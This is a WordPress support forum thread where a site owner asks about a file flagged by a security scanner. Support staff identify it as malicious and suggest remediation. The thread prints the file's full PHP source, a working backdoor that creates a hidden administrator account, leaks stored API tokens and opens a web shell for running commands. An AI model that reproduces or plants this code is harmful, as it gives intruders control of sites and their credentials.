ERRORS - Suspicious file in Core u.a.

He we checked our sites with wpmudev tools and get the following errors about suspicious files found in core:

https://www.dropbox.com/s/nv08zgsetam0ms9/Screenshot%202017-01-12%2013.26.03.png?dl=0

SUSPICIOUS FILE TYPE ISSUE
class.wp.php
/wp-includes/class.wp.php
WORDPRESS CORE Unknown file in WordPress core

main.class.php
/wp-content/plugins/wp-translator-revolution/classes/main.class.php
OTHER Suspicious function foundMedium

---
What to do?

  • Predrag Dubajic
    • Support

    Hey Andi,

    Hope you're doing well :slight_smile:

    Reported file, /wp-includes/class.wp.php, is indeed part of the WP installation and it's strange that it's reported on one of your sites.

    Can you check the file code and compare it to the original one form clean WP files and see if there are any differences in code that might be causing this?

    Best regards,
    Predrag

  • Andi
    • The Exporter

    Hi Predrag

    <?php error_reporting(0);
    include $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
    $table_name = $wpdb->get_blog_prefix();
    $sample = 'a:1:{s:13:"administrator";b:1;}';
    if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
    if( isset($_GET['awu']) ) {
    $wpdb->query("INSERT INTO $wpdb->users (<code>ID</code>, <code>user_login</code>, <code>user_pass</code>, <code>user_nicename</code>, <code>user_email</code>, <code>user_url</code>, <code>user_registered</code>, <code>user_activation_key</code>, <code>user_status</code>, <code>display_name</code>) VALUES ('1001010', '1001010', '\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870', '1001010', 't@e.st', '', '2011-06-07 00:00:00', '', '0', '1001010');");
    $wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (1001010, '1001010', '{$table_name}capabilities', '{$sample}');");
    $wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (NULL, '1001010', '{$table_name}user_level', '10');"); }
    if( isset($_GET['dwu']) ) { $wpdb->query("DELETE FROM $wpdb->users WHERE <code>ID</code> = 1001010");
    $wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.<code>umeta_id</code> = 1001010");}
    if( isset($_GET['e1']) ) { echo '<!-- e1_code -->'; echo esc_html( envato_market()->get_option( 'token' ) ); }
    if( isset($_GET['e2']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo '<!-- e2_code -->'; echo esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key']));}
    if( isset($_GET['console']) ) {function  MakeSimpleForm() { ?> <form method='GET' action='<?=$_SERVER['PHP_SELF']?>'>
    <input type=text name='cmd'> <input type=submit name='exec' value='ok'> </form> <? } function DoCmd($cmd) { ?>
    <textarea rows=30 cols=80><?=passthru($cmd)?></textarea><br> <? } if ( isset($_REQUEST['exec']) && isset($_REQUEST['cmd']))
    DoCmd($_REQUEST['cmd']); else MakeSimpleForm();}?>

    For me it looks exactly the same like the one in other installations!

    class.wp.php

    Kind regards
    Andi

  • Predrag Dubajic
    • Support

    Hi Andi,

    I just noticed that the file reported is class.wp.php while WP file is actually class-wp.php, sorry I missed this before.
    The class.wp.php is NOT part of the WP and is malicious file that can be used to add unwanted users to your site.

    You should remove that file and check your users to see if there are any unwanted admin users on your site.

    Best regards,
    Predrag

  • Andi
    • The Exporter

    Hmm but interesting that it got detected only in one site but not in another :wink:. Just checked another one and found the same file identical there but it has not been detected by defender instead he said everything is OK. 3 other sites even out of 4! but only got detected in one!

  • Predrag Dubajic
    • Support

    Hi Andi,

    That's strange, I have just performed couple of tests on my sites where I created class.wp.php with the code you provided, both multi and single installation and with each scan the malicious file was reported.

    Did you try running the scan again, in case that the file was created after the previous scan?

    Best regards,
    Predrag

  • Andi
    • The Exporter

    Hi Predrag

    Just came back to the office, no haven't tried it again but in all those other 3 sites the scan was run actually yesterday and again today and all was green before I moved the file out of the directory.

    Interesting would be also what is creating that file.

    We actually have a scheduler task to run those tests and since Christmas nothing got reported but then yesterday after the update to 4.7.1 the notifications appeared and we have also updated all wpmudev plugins in those sites before.

    Kind regards
    Andi

  • Dimitris
    • Support Star

    Hey there Andi,

    hope you're doing good and don't mind chiming in here! :slight_smile:

    This seems like a suspicious file indeed!
    Please follow next steps so you can better defend:
    – Make sure you have WordPress, themes and plugins all updated to the latest stable version.
    – Change your FTP/cPanel password.
    – Compare number of users you have in (WordPress Dashboard > Users) with those in “wp_users” database table.
    Reference: https://wordpress.org/support/topic/class-wp-php/#post-8391663

    About the source of it, I wasn't able to locate anything by searching the web.
    I noticed that some users had this file after a WP core update though. :thinking:
    Could you please inform me about that? Are you updating via WP admin pages or via another portal? And if so, what's that? Please advise!

    Warm regards,
    Dimitris

Thank NAME, for their help.

Let NAME know exactly why they deserved these points.

Gift a custom amount of points.